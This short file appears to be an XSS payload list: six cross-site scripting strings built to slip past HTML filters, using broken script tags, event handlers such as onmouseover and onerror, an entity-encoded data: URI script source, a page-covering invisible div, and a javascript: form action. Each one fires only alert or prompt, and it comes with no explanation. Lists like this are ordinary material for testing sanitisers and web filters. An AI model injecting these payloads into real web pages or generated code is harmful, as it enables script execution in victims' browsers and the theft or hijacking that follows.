	<script x> alert</script 1=2

	<div/onmouseover='alert(1)'> style="x:">

	<--`<img/src=` onerror=alert(1)> --!>

	<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,ale&#x00000072;t(1)></script>

	<div style="position:absolute;top:0;left:0;width:100%;height:100%"
	onmouseover="prompt(1)" onclick="alert(1)">x</button>

	<form><button formaction=javascript&colon;alert(1)>CLICKME